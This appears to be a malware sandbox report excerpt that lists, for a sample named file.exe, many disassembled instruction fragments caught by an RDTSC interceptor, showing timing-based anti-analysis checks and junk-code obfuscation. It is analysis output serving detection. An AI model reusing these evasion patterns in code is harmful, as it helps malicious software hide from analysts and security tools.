Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341834 second address: 134183A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134183A second address: 134183E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134183E second address: 1341848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134199A second address: 13419A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341CB3 second address: 1341CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFD80CCF026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341E14 second address: 1341E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD80CDE8C6h 0x00000009 js 00007EFD80CDE8C6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13444DA second address: 13444E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13444E0 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 0C36EBD5h 0x00000011 mov dword ptr [ebp+122D3005h], eax 0x00000017 push dword ptr [ebp+122D02F5h] 0x0000001d movsx ecx, cx 0x00000020 call dword ptr [ebp+122D21C2h] 0x00000026 pushad 0x00000027 pushad 0x00000028 call 00007EFD80CDE8D9h 0x0000002d push ecx 0x0000002e pop eax 0x0000002f pop ebx 0x00000030 jmp 00007EFD80CDE8D0h 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D2D08h], edx 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007EFD80CDE8D6h 0x00000047 mov dword ptr [ebp+122D2B3Eh], eax 0x0000004d jmp 00007EFD80CDE8D3h 0x00000052 mov esi, 0000003Ch 0x00000057 add dword ptr [ebp+122D2D08h], eax 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 sub dword ptr [ebp+122D2CECh], ebx 0x00000067 lodsw 0x00000069 or dword ptr [ebp+122D3035h], edx 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 sub dword ptr [ebp+122D24D1h], ecx 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e nop 0x0000007f push ebx 0x00000080 push eax 0x00000081 push edx 0x00000082 jp 00007EFD80CDE8C6h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344592 second address: 13445B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CCF039h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445B0 second address: 13445D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007EFD80CDE8D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445D2 second address: 13445D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445D6 second address: 13445DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445DA second address: 13445ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445ED second address: 13445FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445FC second address: 1344692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007EFD80CCF035h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop eax 0x0000000f mov edi, dword ptr [ebp+122D17CEh] 0x00000015 call 00007EFD80CCF036h 0x0000001a jnp 00007EFD80CCF026h 0x00000020 pop esi 0x00000021 push 00000003h 0x00000023 mov di, ax 0x00000026 push 00000000h 0x00000028 mov edx, dword ptr [ebp+122D24EDh] 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007EFD80CCF028h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov esi, dword ptr [ebp+122D2A4Eh] 0x00000050 push B4254946h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 jmp 00007EFD80CCF036h 0x0000005d pop ecx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344692 second address: 1344703 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CDE8DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0BDAB6BAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007EFD80CDE8C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add edx, dword ptr [ebp+122D2C22h] 0x00000031 movsx edx, di 0x00000034 lea ebx, dword ptr [ebp+124563EDh] 0x0000003a mov dword ptr [ebp+122D25AAh], edx 0x00000040 push eax 0x00000041 pushad 0x00000042 jo 00007EFD80CDE8C8h 0x00000048 push edx 0x00000049 pop edx 0x0000004a pushad 0x0000004b jns 00007EFD80CDE8C6h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344A71 second address: 1344A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344A75 second address: 1344A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364803 second address: 1364809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364809 second address: 1364820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CDE8CCh 0x0000000b popad 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BE3 second address: 1364BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BE9 second address: 1364BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BF2 second address: 1364C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007EFD80CCF038h 0x0000000d pop eax 0x0000000e jl 00007EFD80CCF032h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364C1B second address: 1364C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364C21 second address: 1364C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D68 second address: 1364D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D81 second address: 1364D9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007EFD80CCF026h 0x0000000f jmp 00007EFD80CCF02Ch 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D9D second address: 1364DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364DB1 second address: 1364DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13651BE second address: 13651D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136543C second address: 1365442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365442 second address: 1365448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365594 second address: 13655A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF030h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13655A8 second address: 13655D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007EFD80CDE8D3h 0x00000010 jmp 00007EFD80CDE8CDh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136572D second address: 1365731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135CC76 second address: 135CC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007EFD80CDE8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135CC87 second address: 135CCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jg 00007EFD80CCF03Eh 0x0000000f push esi 0x00000010 jnl 00007EFD80CCF026h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365F89 second address: 1365F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366422 second address: 1366445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF032h 0x00000009 jmp 00007EFD80CCF02Ch 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366445 second address: 136645E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136645E second address: 1366462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366462 second address: 1366493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007EFD80CDE90Bh 0x0000000e pushad 0x0000000f jmp 00007EFD80CDE8D3h 0x00000014 jo 00007EFD80CDE8C6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366493 second address: 1366497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C960 second address: 136C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371835 second address: 1371854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF026h 0x00000008 jmp 00007EFD80CCF035h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371854 second address: 1371859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334853 second address: 133487B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFD80CCF035h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133487B second address: 133488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFD80CDE8C6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133488B second address: 1334899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD80CCF026h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334899 second address: 133489F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133489F second address: 13348B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF031h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13348B9 second address: 13348D8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD80CDE8C6h 0x00000008 jmp 00007EFD80CDE8CDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007EFD80CDE8C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13348D8 second address: 13348DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1370F86 second address: 1370F90 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13710D7 second address: 1371100 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007EFD80CCF038h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007EFD80CCF026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371100 second address: 1371110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD80CDE8C6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371110 second address: 1371114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371114 second address: 137112F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jne 00007EFD80CDE8C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13713ED second address: 13713F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13713F1 second address: 1371428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007EFD80CDE8CCh 0x0000000f jmp 00007EFD80CDE8D5h 0x00000014 popad 0x00000015 jmp 00007EFD80CDE8CBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371581 second address: 1371597 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007EFD80CCF026h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371597 second address: 13715A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13715A1 second address: 13715A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13732B4 second address: 13732C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8CEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13733B6 second address: 13733CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF034h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373985 second address: 13739C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007EFD80CDE8D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFD80CDE8CCh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373DAB second address: 1373DBC instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD80CCF028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373EF7 second address: 1373EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373FBD second address: 1373FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D17B1h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 jmp 00007EFD80CCF02Eh 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13744D9 second address: 1374513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CDE8D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFD80CDE8D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374EFB second address: 1374F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD80CCF039h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374F22 second address: 1374F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374F26 second address: 1374FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007EFD80CCF026h 0x0000000d pop ebx 0x0000000e popad 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D2A26h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007EFD80CCF028h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 jo 00007EFD80CCF02Ch 0x00000038 mov edi, dword ptr [ebp+122D1CBBh] 0x0000003e push 00000000h 0x00000040 or dword ptr [ebp+122D2CECh], edx 0x00000046 xchg eax, ebx 0x00000047 push edx 0x00000048 jng 00007EFD80CCF03Bh 0x0000004e jmp 00007EFD80CCF035h 0x00000053 pop edx 0x00000054 push eax 0x00000055 jp 00007EFD80CCF044h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007EFD80CCF032h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137662F second address: 1376633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377356 second address: 1377370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF036h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377370 second address: 137739C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007EFD80CDE8C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377DA8 second address: 1377DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007EFD80CCF026h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377DB6 second address: 1377E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007EFD80CDE8D5h 0x0000000d jmp 00007EFD80CDE8D2h 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007EFD80CDE8C8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1BD2h], eax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007EFD80CDE8C8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 js 00007EFD80CDE8CCh 0x00000057 sub dword ptr [ebp+122D1CA3h], edx 0x0000005d xchg eax, ebx 0x0000005e jmp 00007EFD80CDE8D8h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 pop eax 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377E60 second address: 1377E66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379247 second address: 137924C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137924C second address: 1379252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
